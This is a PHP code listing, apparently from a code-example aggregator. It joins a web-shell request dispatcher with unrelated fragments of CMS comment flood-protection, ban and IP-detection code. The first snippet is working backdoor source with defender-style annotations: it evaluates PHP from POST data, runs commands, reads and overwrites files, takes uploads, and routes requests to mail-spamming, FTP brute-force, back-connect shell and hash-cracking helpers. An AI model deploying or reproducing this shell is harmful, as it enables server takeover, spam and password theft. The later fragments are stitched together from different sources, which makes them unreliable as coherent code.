/**
 * Request dispatcher of a PHP web shell: picks an action from $_POST['type']
 * and runs it with other request fields as arguments.
 *
 * Review notes (defender's view):
 * - No authentication or authorization check is visible in this function;
 *   whether the caller performs one cannot be told from here.
 * - Every branch consumes request data directly. The repeated stripslashes()
 *   calls presumably undo magic-quotes escaping (TODO confirm); they are not
 *   sanitization.
 * - The combination visible below (eval() on a request field, request-driven
 *   file read/write, move_uploaded_file() with a request-chosen name) is what
 *   code review and file-integrity scanning should flag on a web root.
 * - ex(), safe_ex(), safe_read(), pwd(), alias(), spammer(), ftp_brute(),
 *   flooder(), backconnect() and md5_brute() are defined outside this
 *   excerpt; their behavior is inferred from names and arguments only.
 *
 * @return mixed Output of the directory-listing helper for type 3 and for
 *               unknown types, an error string when a type-4 file is missing,
 *               otherwise null (other branches echo their result instead).
 */
function shell()
{
    // Loose comparison (==): the string sent in the POST body is compared numerically.
    if ($_POST['type'] == 1) {
        // Arbitrary PHP execution: the request body is handed to eval() as-is.
        eval(stripslashes($_POST['value']));
    } elseif ($_POST['type'] == 2) {
        pwd();
        // ex() is presumably a command-execution wrapper (it is given 'ls -la' below) - confirm.
        print_r(ex(stripslashes($_POST['value'])));
    } elseif ($_POST['type'] == 3) {
        // Directory listing: try the Unix command first, fall back to the Windows one.
        // The session flag selects the safe_ex() variant instead of ex().
        if ($_SESSION['safe_mode'] == 1) {
            if (($u = safe_ex('ls -la')) != '') {
                return $u;
            } else {
                return safe_ex('dir');
            }
        } else {
            if (($u = ex('ls -la')) != '') {
                return $u;
            } else {
                return ex('dir');
            }
        }
    } elseif ($_POST['type'] == 4) {
        // File read: the path comes straight from the request, with no base-directory restriction.
        if (file_exists(stripslashes($_POST['value']))) {
            // $safe_mode is neither assigned nor declared global in this function, so it is
            // null here and this comparison is always true; the safe_read() branch is not
            // reached as written (the type-3 branch uses $_SESSION['safe_mode'] instead).
            if ($safe_mode != 1) {
                echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']), "rw"), filesize(stripslashes($_POST['value']))));
            } else {
                echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
            }
            // Remember the path so that a later type-5 request overwrites the same file.
            $_SESSION['edit'] = 1;
            $_SESSION['filename'] = $_POST['value'];
        } else {
            return 'File doesn\'t exists!';
        }
    } elseif ($_POST['type'] == 5) {
        // File write: replaces the file remembered in the session with request data.
        // The handle returned by fopen() is never closed.
        fputs(fopen($_SESSION['filename'], "w"), stripslashes($_POST['value']));
    } elseif ($_POST['type'] == 6) {
        // Upload: the destination is pwd() plus a request-chosen name (or the client-supplied
        // original name); neither the extension nor the path is validated.
        $uploaddir = pwd();
        if (!($name = $_POST['newname'])) {
            $name = $_FILES['userfile']['name'];
        }
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    } elseif ($_POST['type'] == 7) {
        echo alias($_POST['value']);
    } elseif ($_POST['type'] == 8) {
        // Types 8-14 forward request fields to helpers whose names suggest mail sending,
        // FTP password guessing, mail flooding, outbound/listening shells and MD5 dictionary
        // guessing - inferred from the names, confirm against their definitions.
        echo spammer(stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['check']), stripslashes($_POST['elist']), stripslashes($_POST['logf']));
    } elseif ($_POST['type'] == 9) {
        echo ftp_brute(stripslashes($_POST['host']), stripslashes($_POST['users']), stripslashes($_POST['passwd']), stripslashes($_POST['log']));
    } elseif ($_POST['type'] == 10) {
        echo flooder(stripslashes($_POST['log']), stripslashes($_POST['to']), stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['amount']), stripslashes($_POST['check']));
    } elseif ($_POST['type'] == 12) {
        echo backconnect(stripslashes($_POST['ip']), stripslashes($_POST['port']), stripslashes($_POST['method']));
    } elseif ($_POST['type'] == 13) {
        // Same helper as type 12, but called with (port, pass, method) instead of (ip, port, method).
        echo backconnect(stripslashes($_POST['port']), stripslashes($_POST['pass']), stripslashes($_POST['method']));
    } elseif ($_POST['type'] == 14) {
        echo md5_brute(stripslashes($_POST['hash']), stripslashes($_POST['log']), stripslashes($_POST['dict']));
    } else {
        // Unknown or missing type (no branch handles 11): default to the directory listing.
        $u = ex('ls -la');
        if ($u == '') {
            return ex('dir');
        } else {
            return $u;
        }
    }
    return null;
}
Example #2
    $CN_HALT = TRUE;
}
// Comment-form validation: each failed check appends a localized message to
// $stop and raises the $CN_HALT flag.
if ($comments == '') {
    $stop[] = $lang['news_err_11'];
    $CN_HALT = TRUE;
}
// $parse is filled in outside this excerpt; the two flags presumably record
// disallowed markup and disallowed text found in the comment - confirm.
if ($parse->not_allowed_tags) {
    $stop[] = $lang['news_err_33'];
    $CN_HALT = TRUE;
}
if ($parse->not_allowed_text) {
    $stop[] = $lang['news_err_37'];
    $CN_HALT = TRUE;
}
// Flood throttle: applied only to user groups numbered above 2, only when a
// flood interval is configured, and only if no earlier check has failed.
// NOTE(review): the throttle is keyed on $_IP, whose origin is not shown here.
// If it is derived from a client-supplied header rather than the socket
// address, the limit can be sidestepped - confirm where $_IP is set.
if ($member_id['user_group'] > 2 and intval($config['flood_time']) and !$CN_HALT) {
    if (flooder($_IP) == TRUE) {
        $stop[] = $lang['news_err_4'] . " " . $lang['news_err_5'] . " {$config['flood_time']} " . $lang['news_err_6'];
        $CN_HALT = TRUE;
    }
}
// Threaded comments: parent id and indent level are taken from the request and
// forced to integers; anything missing or non-positive becomes 0.
if ($config['tree_comments']) {
    if ($_POST['parent'] and intval($_POST['parent']) > 0) {
        $parent = intval($_POST['parent']);
    } else {
        $parent = 0;
    }
    if ($_POST['indent'] and intval($_POST['indent']) > 0) {
        $indent = intval($_POST['indent']);
    } else {
        $indent = 0;
    }
    // NOTE(review): this return and the closing brace look like the tail of a
    // different snippet joined onto this one by the listing - confirm against
    // the original file before relying on the control flow shown here.
    return FALSE;
}
//----------------------------------
// Check if IP is blocked or wrong
//----------------------------------
// A ban matches on either the address or the submitted name. $ip and $name are
// set outside this excerpt; NOTE(review): a ban keyed on a client-chosen name,
// or on an address taken from request headers, is easy to evade - confirm
// where both values come from.
$is_ban = (user_getban($ip) or user_getban($name)) ? true : false;
// user really banned
if ($is_ban) {
    echo '<div class="blocking_posting_comment">' . lang('Sorry but you have been blocked from posting comments') . '</div>';
    return FALSE;
}
//----------------------------------
// Flood Protection
//----------------------------------
// Skipped when the interval is 0 or empty. flooder() receives the address and
// $id; the message below suggests the limit applies per article, so $id is
// presumably the article id - confirm.
if ($config_flood_time != 0 and $config_flood_time != "") {
    if (flooder($ip, $id) == true) {
        // Only the configured interval is substituted into the message; no request data is echoed.
        echo '<div class="blocking_posting_comment">' . str_replace('%1', $config_flood_time, lang('Flood protection activated! You have to wait %1 seconds after your last comment before posting again at this article')) . '</div>';
        return FALSE;
    }
}
//----------------------------------
// Check if the name is protected
//----------------------------------
// Looks up the submitted name; the result is used by code after this excerpt.
$user_member = user_search($name);
// The submitted name does not match the stored name ($CNname) or the session user
if ($CNname && $CNpass && $CNname != $name or $name && $_SESS['user'] && $_SESS['user'] != $name) {
    echo proc_tpl('remember');
    echo getpart('forget_me_script');
    $refer = $_SERVER['HTTP_REFERER'];
    echo proc_tpl('wrong_user');
    return FALSE;
Example #4
                 }
                 if ($answer and $answer == $question_answer) {
                     $pass_answer = true;
                     break;
                 }
             }
         }
         if (!$pass_answer) {
             $stop .= $lang['reg_err_24'];
         }
     } else {
         $stop .= $lang['reg_err_24'];
     }
 }
 // Per-group posting throttle: flooder() is given the member name and the
 // group's configured interval; a hit appends an error item to $stop.
 if ($user_group[$member_id['user_group']]['flood_news']) {
     if (flooder($member_id['name'], $user_group[$member_id['user_group']]['flood_news'])) {
         $stop .= "<li>" . $lang['news_err_4'] . " " . $lang['news_err_43'] . " {$user_group[$member_id['user_group']]['flood_news']} " . $lang['news_err_6'] . "</li>";
     }
 }
 // Daily quota: count this author's posts dated today and compare the count
 // with the group's max_day_news limit.
 $max_detected = false;
 if ($user_group[$member_id['user_group']]['max_day_news']) {
     // NOTE(review): $member_id['name'] is interpolated into the SQL string
     // inside quotes. This is safe only if the value is guaranteed to be
     // escaped before it gets here; that is not visible in this excerpt, so
     // confirm, or escape/parameterize it at this call.
     $row = $db->super_query("SELECT COUNT(*) as count FROM " . PREFIX . "_post WHERE date >= '" . date("Y-m-d", $_TIME) . "' AND date < '" . date("Y-m-d", $_TIME) . "' + INTERVAL 24 HOUR AND autor = '{$member_id['name']}'");
     if ($row['count'] >= $user_group[$member_id['user_group']]['max_day_news']) {
         $stop .= "<li>" . $lang['news_err_44'] . "</li>";
         $max_detected = true;
     }
 }
 // Any collected errors are wrapped in a list with a "back" link and shown via msgbox().
 // The pieces concatenated into $stop in this excerpt are language strings and
 // configuration values, not request data.
 if ($stop) {
     $stop = "<ul>" . $stop . "</ul><a href=\"javascript:history.go(-1)\">{$lang['all_prev']}</a>";
     msgbox($lang['add_err_6'], $stop);
 }
 // Client address selection: a forwarded-for value wins, then a client-ip
 // value, and the socket address is used only when both are absent.
 // The bare $HTTP_* / $REMOTE_ADDR variables are presumably register_globals
 // style copies of the request environment - confirm.
 // NOTE(review): the first two values are request headers chosen by the
 // client, so the flood limit and the ban check below can be keyed on an
 // address the sender picked. Prefer the socket address unless the header is
 // set by a trusted reverse proxy.
 if (isset($HTTP_X_FORWARDED_FOR)) {
     $ip = $HTTP_X_FORWARDED_FOR;
 } elseif (isset($HTTP_CLIENT_IP)) {
     $ip = $HTTP_CLIENT_IP;
 }
 if ($ip == "") {
     $ip = $REMOTE_ADDR;
 }
 if ($ip == "") {
     $ip = "not detected";
 }
 # keep scriptkiddies out
 # (forces $id to an integer in place, so non-numeric input cannot be carried further)
 settype($id, "int");
 # Check Flood Protection
 if ($config_flood_time != 0 and $config_flood_time != "") {
     if (flooder($ip, $id) == TRUE) {
         echo "<div style=\"text-align: center;\">{$lang_floodprot}</div>";
         $CN_HALT = TRUE;
         # leaves an enclosing loop or switch that starts outside this excerpt
         break 1;
     }
 }
 # Check if IP is banned
 $blockip = FALSE;
 # The ban list is read without a lock, then reopened in "w" mode, which
 # truncates it immediately; the exclusive lock (2 is LOCK_EX) is requested only
 # after the truncation, with errors suppressed by @.
 # NOTE(review): the code that rewrites the list lies past the end of this
 # excerpt. A concurrent request or a failure between the truncate and the
 # rewrite would leave the ban list empty or partial - confirm against the
 # full file.
 $old_ips = file("{$cutepath}/data/ipban.db.php");
 $new_ips = fopen("{$cutepath}/data/ipban.db.php", "w");
 @flock($new_ips, 2);
 foreach ($old_ips as $null => $old_ip_line) {
     $ip_arr = explode("|", $old_ip_line);
     # ?id = "168". ?title = "Ban partial IPs";
     $_allowed = true;
     $this_banned_ip = str_replace('.', '\\.', $ip_arr[0]);